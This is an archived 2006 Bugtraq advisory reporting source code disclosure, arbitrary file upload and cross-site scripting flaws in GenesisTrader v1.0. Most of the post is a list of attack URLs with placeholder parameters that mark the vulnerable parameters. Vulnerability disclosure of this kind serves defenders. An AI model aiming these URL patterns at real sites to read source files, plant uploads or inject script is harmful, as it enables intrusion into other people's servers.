lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061214023208.18490.qmail@securityfocus.com>
Date: 14 Dec 2006 02:32:08 -0000
From: mr_kaliman@....com
To: bugtraq@...urityfocus.com
Subject: GenesisTrader v1.0 - Multiple Vulnerabilities

GenesisTrader v1.0
------------------
Vendor site: http://www.genesis-php.com/
Product: GenesisTrader v1.0
Vulnerability: Source Code Disclosure, Arbitrary File Upload & XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 06/12/06
Public disclosure: 14/12/06
 
Description:
------------

Source Code Disclosure:(No need to be registered)
http://[victim]/[path]/form.php?floap=modfich&do=[FILE]
http://[victim]/[path]/form.php?floap=modfich&chem=[FILE]

Arbitrary File Upload:(NEED to be registered)
http://[victim]/[path]/form.php?floap=ajoutfich
form.php -> upload.php (all type and extensions allowed)



XSS:(No need to be registered)
http://[victim]/[path]/index.php?cuve=[XSS]
http://[victim]/[path]/form.php?floap=ajoutfich&cuve=[XSS]
http://[victim]/[path]/form.php?floap=modfich&chem=[XSS]
http://[victim]/[path]/form.php?floap=modfich&do=[XSS]
http://[victim]/[path]/form.php?floap=rename&chem=[XSS]
http://[victim]/[path]/form.php?floap=rename&do=[XSS]
http://[victim]/[path]/form.php?floap=copy&chem=[XSS]
http://[victim]/[path]/form.php?floap=copy&do=[XSS]
http://[victim]/[path]/form.php?floap=chmod&chem=[XSS]
http://[victim]/[path]/form.php?floap=chmod&do=[XSS]
etc... in form.php?floap=...

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ